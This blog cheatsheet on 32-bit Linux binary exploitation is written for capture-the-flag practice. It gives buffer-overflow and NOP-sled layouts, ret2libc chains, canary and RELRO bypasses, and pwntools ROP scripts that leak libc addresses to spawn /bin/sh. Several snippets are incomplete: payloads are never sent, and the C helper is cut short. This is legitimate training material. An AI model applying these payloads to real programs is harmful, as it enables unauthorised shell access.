32-bit Linux Binary Exploitation Cheatsheet


#install libc6-i386 when working on 32bit challenges from 64-bit
sudo apt install libc6-i386

# Simple BOF 
# jmp_address - somewhere at the start of NOPS
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address

#When you have less buffer add the exploit in env and try t ocall it 
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)
#find the size of the stack 
p/d ($ebp-$esp)/4+4
#Update the size 
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')

#DEP/NX Bypass 
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh 

# DEP + ASLR Bypass
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh  > payload
while true; do ./vuln $(cat payload.txt);done

#Canary Bypass
- Set a break point on the stack right after the canary cookie creation 
- Find the address of stack cookie and note it down.
	- EX: DWORD PTR [esp+0x1c],eax
	-  x/wx $esp+0x1c
- Use RET2LIBC technique to exploit the program, then after the buffer, we will restore the canary cookie.  - Buffer + SYSTEM + EXIT + /bin/sh 
- Right before the cookie value is validated we pause the session and update the cookie value
- #Get the stack cookie - canary 
		gdb-peda$ x/wx $esp+0x1c
		0xbffff05c:	0xf6f56000
>  set {int}0xbffff05c=0xf6f56000

# CANARY + RELRO Bypass 
#find a function that needs to be called from GOT and send both the addresses one after another 
other_function sytem_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"') 

# ROP Chaining 
# call printf function first then run your shell 
# for single jump use popret
# for double jump use pop2ret
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr
NX with ASLR is enabled - RET2PUTS/RET2System

payload = ""
payload += "A"*140             #junk buffer
payload += p32(system)         #EIP overwrite
payload += p32(exit)           #return address
payload += p32(binsh)          # Argument to system
ROP Exploit

from pwn import *

buffer = b"A" * 140

printf_addr = p32(0xb7e31520)
pop_ret = p32(0x80482c9)
print1_addr = p32(0x8048510)

system_addr = p32(0xb7e1d3d0)
exit_addr = p32(0xb7e105a0)
binsh_addr = p32(0xb7f5e1db)

#payload = buffer + system_addr + exit_addr + binsh_addr

payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr

# Launch the vulnerable program and feed it the payload
p = process('./v1')

- works when write and read functions are accessible 

from pwn import *

#objdump -d rop | grep ">:"   --> take write address
write = p32(0x08048380) 

#Get the address of functions in the GOT
#take the read address from here as we need the dynamic vlaue from GOT section 
read = p32(0x0804a00c)

#instead of vuln func address - anything can be here as we are just looking to exec it to gain leak address
some_func_addr = p32(0x080484c6)

# write(1,address_read_GOT,4)
leak = "A"*140 + write + some_func_addr  + "\x01\x00\x00\x00" + read + "\x04\x00\x00\x00"

exploit = process("./vuln", shell=True)
read_addr = unpack(exploit.recv(4))

print ("[+] Read Address is at :", hex(read_addr))

system_addr = read_addr - 0xa8810 
binsh_addr = read_addr - 0xfff69d45
exit_addr = read_addr - 0xb55c0

print ("[+] System  Address is at :", hex(system_addr))
print ("[+] binsh  Address is at :", hex(binsh_addr))
print ("[+] Exit  Address is at :", hex(exit_addr))

shell = "A"*140 + pack(system_addr) + pack(exit_addr) + pack(binsh_addr)


GET ENV Address

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment